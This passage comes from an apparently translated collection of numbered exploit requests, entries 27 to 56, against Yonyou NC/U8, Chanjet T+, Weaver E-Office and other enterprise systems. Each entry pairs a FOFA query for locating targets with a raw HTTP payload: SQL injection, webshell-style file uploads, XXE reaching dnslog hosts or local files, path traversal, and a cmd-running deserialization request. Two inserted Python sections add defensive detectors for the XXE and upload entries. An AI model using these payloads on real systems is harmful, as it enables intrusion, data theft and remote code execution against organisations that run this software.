Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Uploaded file path:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
Version: <= 6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
Version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
Version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
  <soapenv:Header/>
  <soapenv:Body>
    <iup:getResult>
      <!--type: string-->
      <iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
    </iup:getResult>
  </soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8 Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Verification URL:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
  <soapenv:Header/>
  <soapenv:Body>
    <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
    </ser:getUserNameById>
  </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

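Defender-side check for the XXE entries 36, 37, 38, 40 and 45, written for this page (not code from the original post or from Yonyou). Between them those five requests show the three places a DTD can hide: a raw XML body (40), an XML fragment inside a form field such as msg=, __xml= or reqData= (36, 38, 45), and a DOCTYPE smuggled inside a SOAP CDATA string that the service parses a second time (37). The first function finds and classifies the declaration; the second shows the parser-side fix with the standard library's expat: refuse any DOCTYPE before entity handling starts, which removes every variant above at once. Sample documents are constructed from the entries; hosts are placeholders.

```python
import re
import xml.parsers.expat
from urllib.parse import parse_qsl

_DOCTYPE_EXTERNAL = re.compile(r"<!DOCTYPE\s+\S+\s*(?:SYSTEM|PUBLIC)\s", re.I)
_ENTITY_EXTERNAL = re.compile(r"<!ENTITY\s+(%\s*)?(\w+)\s+(?:SYSTEM|PUBLIC)\s", re.I)
_CDATA = re.compile(r"<!\[CDATA\[(.*?)\]\]>", re.S)

# Constructed samples in the shape of entries 36, 37, 40 and 45 (hosts are placeholders).
SAMPLE_36 = ('msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]>'
             '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
             '<soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode>'
             '</soap:Fault></soap:Body></soap:Envelope>%0a')
SAMPLE_37 = ('<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
             'xmlns:iup="http://update.oba.uap.nc/IUpdateService"><soapenv:Body>'
             '<iup:getResult><iup:string><![CDATA[\n<!DOCTYPE xmlrootname [<!ENTITY % aaa '
             'SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>\n<xxx/>]]></iup:string>'
             '</iup:getResult></soapenv:Body></soapenv:Envelope>')
SAMPLE_40 = ('<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]>'
             '<r><a>&xxe;</a></r>')
SAMPLE_45 = ('reqData=<?xml version="1.0"?>\n<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">'
             '&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest')


def xml_candidates(body: str) -> list[str]:
    """Every text a server-side XML parser might be fed from this request body."""
    out = [body]
    # Form fields such as msg=, __xml= and reqData= carry percent-encoded XML.
    for _, value in parse_qsl(body, keep_blank_values=True):
        if "<" in value:
            out.append(value)
    # CDATA is opaque to the outer parser but is often parsed again downstream.
    for text in list(out):
        out.extend(_CDATA.findall(text))
    return out


def classify_xxe(body: str) -> list[str]:
    """Labels such as 'external-dtd', 'external-entity:xxe' or 'parameter-entity:aaa';
    an empty list means no DTD indicator was found anywhere in the body."""
    labels: set[str] = set()
    for text in xml_candidates(body):
        if _DOCTYPE_EXTERNAL.search(text):
            labels.add("external-dtd")
        for percent, name in _ENTITY_EXTERNAL.findall(text):
            labels.add(("parameter-entity:" if percent else "external-entity:") + name)
    return sorted(labels)


def parse_no_doctype(xml_text: str) -> list[str]:
    """Parse with expat but abort on any DOCTYPE; returns the element names seen.

    An exception raised inside the handler propagates out of Parse(), so a document
    that declares a DTD (the precondition for every XXE above) never reaches the
    entity-expansion stage. Parameter-entity parsing is switched off as well."""
    names: list[str] = []
    parser = xml.parsers.expat.ParserCreate()
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject(doctype_name, system_id, public_id, has_internal_subset):
        raise ValueError(f"DOCTYPE not allowed: {doctype_name}")

    parser.StartDoctypeDeclHandler = reject
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(xml_text, True)
    return names


def is_rejected(xml_text: str) -> bool:
    """True when the hardened parser refuses the document."""
    try:
        parse_no_doctype(xml_text)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for sample in (SAMPLE_36, SAMPLE_37, SAMPLE_40, SAMPLE_45):
        print(classify_xxe(sample), "rejected by hardened parser:", is_rejected(sample))
```

The classifier is what you run over captured traffic; the hardened parser is what the receiving service should have been using. Note that entry 37's outer SOAP envelope is clean XML and would pass parse_no_doctype; the rejection has to happen wherever the CDATA string is parsed the second time, which is why the classifier looks inside CDATA as well.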
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud (government finance cloud) arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Uploaded file path:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

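Defender-side check for the upload entries 24, 28, 35, 48 and 49, written for this page (not code from the original post or from Yonyou). Those requests show five distinct ways an upload filter is beaten: a script body under a harmless .txt name with the real destination path in a second form field (24), an extension chosen by a query parameter rather than the file (28), a traversal path inside filename= (35), an authentication bypass flag in the query string (48, 49) and a trailing space after .php that a naive extension check misses (49). The inspector parses the multipart body itself and returns a label for each of those conditions, so it can sit in front of an upload handler or run over a packet capture. Sample requests are constructed from the entries; the boundaries are the ones they use.

```python
import re
from urllib.parse import parse_qs

EXEC_EXT = {"jsp", "jspx", "jspf", "php", "php5", "phtml", "asp", "aspx", "ashx", "asmx"}
SCRIPT_MARKERS = ("<%", "<?php", "<?=", "<script runat=")
_BOUNDARY = re.compile(r'boundary="?([^";]+)"?', re.I)
_PARAM = re.compile(r'(\w+)="([^"]*)"')

# Constructed samples (query string, Content-Type, body) in the shape of entries 24, 28 and 49.
_B24 = "---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc"
SAMPLE_24 = ("", "multipart/form-data; boundary=" + _B24,
             f"--{_B24}\r\n"
             'Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"\r\n'
             "Content-Type: text/plain\r\n\r\n"
             '<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>\r\n'
             f"--{_B24}\r\n"
             'Content-Disposition: form-data; name="fname"\r\n\r\n'
             "\\webapps\\nc_web\\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp\r\n"
             f"--{_B24}--\r\n")
_B28 = "----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk"
SAMPLE_28 = ("groupid=nc&fileType=jsp", "multipart/form-data; boundary=" + _B28,
             f"--{_B28}\r\n"
             'Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"\r\n'
             "Content-Type: application/octet-stream\r\n\r\n"
             '<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>\r\n'
             f"--{_B28}--\r\n")
_B49 = "---------------------------vvv3wdayqv3yppdxvn3w"
SAMPLE_49 = ("DontCheckLogin=1&vname=file", "multipart/form-data; boundary=" + _B49,
             f"--{_B49}\r\n"
             'Content-Disposition: form-data; name="file"; filename="%s.php "\r\n'
             "Content-Type: application/octet-stream\r\n\r\n"
             "wersqqmlumloqa\r\n"
             f"--{_B49}\r\n"
             'Content-Disposition: form-data; name="upload"\r\n\r\n'
             "upload\r\n"
             f"--{_B49}--\r\n")


def _ext(name: str) -> str:
    """Extension after stripping the trailing spaces and dots that Windows drops."""
    cleaned = name.strip().rstrip(". ")
    return cleaned.rsplit(".", 1)[-1].lower() if "." in cleaned else ""


def parse_multipart(body: str, content_type: str) -> list[dict]:
    """Split a multipart/form-data body into {'name', 'filename', 'data'} dicts."""
    m = _BOUNDARY.search(content_type)
    if not m:
        return []
    parts = []
    for chunk in body.replace("\r\n", "\n").split("--" + m.group(1))[1:]:
        if chunk.startswith("--"):          # closing delimiter
            break
        head, _, data = chunk.lstrip("\n").partition("\n\n")
        disp = next((h for h in head.split("\n") if h.lower().startswith("content-disposition:")), "")
        params = dict(_PARAM.findall(disp))
        parts.append({"name": params.get("name", ""), "filename": params.get("filename"),
                      "data": data.rstrip("\n")})
    return parts


def inspect_upload(query: str, content_type: str, body: str) -> set[str]:
    """Labels describing why this upload request should be refused (empty set = clean)."""
    labels: set[str] = set()
    q = parse_qs(query)
    if "1" in q.get("DontCheckLogin", []):
        labels.add("auth-bypass-param:DontCheckLogin")
    for v in q.get("fileType", []):
        if v.lower() in EXEC_EXT:
            labels.add("exec-ext-from-query:" + v)
    for p in parse_multipart(body, content_type):
        fn, field, data = p["filename"], p["name"], p["data"]
        if fn is not None:
            if fn != fn.strip() or fn.rstrip(". ") != fn:
                labels.add("trailing-space:" + field)
            if ".." in fn or "/" in fn or "\\" in fn:
                labels.add("traversal:" + field)
            if _ext(fn) in EXEC_EXT:
                labels.add("exec-ext:" + field)
        elif _ext(data) in EXEC_EXT and ("/" in data or "\\" in data):
            labels.add("path-in-field:" + field)    # entry 24: destination path in fname
        if any(mk in data for mk in SCRIPT_MARKERS):
            labels.add("script-content:" + field)
    return labels


if __name__ == "__main__":
    for sample in (SAMPLE_24, SAMPLE_28, SAMPLE_49):
        print(sorted(inspect_upload(*sample)))
```

The two checks that matter most in practice are the ones filename-only filters miss: the content sniff (entry 24 uploads a .txt whose body is JSP) and the second form field that names the destination. Treat any label as a reject; the set is returned rather than a boolean so the reason can be logged.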
50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong Socialized Business ERP validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

Note: the only POC given is the URL-encoded traversal path above, which reads /etc/passwd; the source does not include an upload request for this entry.

54. Chanjet T+ GetStoreWarehouseByStore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. The command runs on the server and writes the given string into a file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL to confirm the file was written:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ GetDecAllUsers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using that Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
